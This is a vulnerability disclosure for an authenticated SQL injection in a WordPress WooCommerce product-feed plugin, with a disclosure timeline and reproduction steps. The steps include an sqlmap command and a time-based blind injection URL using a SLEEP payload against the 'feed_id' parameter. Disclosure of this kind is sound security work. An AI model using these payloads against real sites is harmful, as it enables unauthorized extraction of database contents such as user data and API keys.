CVE-2021-25068 - Exportfeed for Woocommerce Google Product Feed <=1.2.4 Authenticated SQL Injection

CVE-2021-25068

CVSS: Pending

https://wordpress.org/plugins/exportfeed-for-woocommerce-google-product-feed/

https://wpscan.com/vulnerability/32799efd-99dc-46dd-8648-e9eb872a0371

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25068

Disclosure Timeline

Dec 13, 2021: Issue Identified and Disclosed to Wpscan (#5634)

Dec 13, 2021 : Got auto reply

Dec 16th, 2021 : Got update that vendor had been contacted, CVE Assigned CVE-2021-25068

February 21, 2022: Plugin closed

March 28, 2022: CVE Published in NVD

Description:

The 'Exportfeed for Woocommerce Google Product Feed' Wordpress plugin v1.2.4 uses a 'feed_id' POST parameter which is not properly sanitized for use in an SQL statement, leading to a SQL injection vulnerability.

We can see the problematic code in fetch_product_ajax.php

This vulnerability is present in the current version of the plugin 1.2.4 Administrative access is required to access the vulnerable functionality.

 

Link to plugin:

 

https://wordpress.org/plugins/exportfeed-for-woocommerce-google-product-feed/

Steps to reproduce:

1. Log into WordPress as the admin user

2. Install WooCommerce and 'Exportfeed for Woocommerce Google Product Feed' plugins

3. Perform initial config for the WooCommerce plugin and create a product

4. In the ExportFeed plugin settings go to Create Feed and Click Custom Product Feed, search for a product and capture the request with an intercepting proxy.

5. Modify the original request parameters so we hit the appropriate functionality

Original request:

Modified request:

&q=showT&feed_id=1

6. Save the request to a file, request.txt

7. Run sqlmap to pull the current user

sqlmap -r request.txt --dbms=mysql --current-user --keep-alive --level=3 --risk=3 -p product_id --threads=5 --flush-session

Or

https://test0.local/wp-admin/admin-ajax.php?security=a5e2dfc8ec&action=gcpf_cart_product&feedpath=core/ajax/wp/fetch_product_ajax.php&keywords=snake&category=&brand=&sku=&merchat_type=Google&service_name=Google&limit=0,10&q=showT&feed_id=1 AND (SELECT 2347 FROM (SELECT(SLEEP(5)))Otih)

Using this technique, we can also (slowly) dump the entire contents of the database, including the key for the ebay connection this plugin uses, WordPress users,  and so on.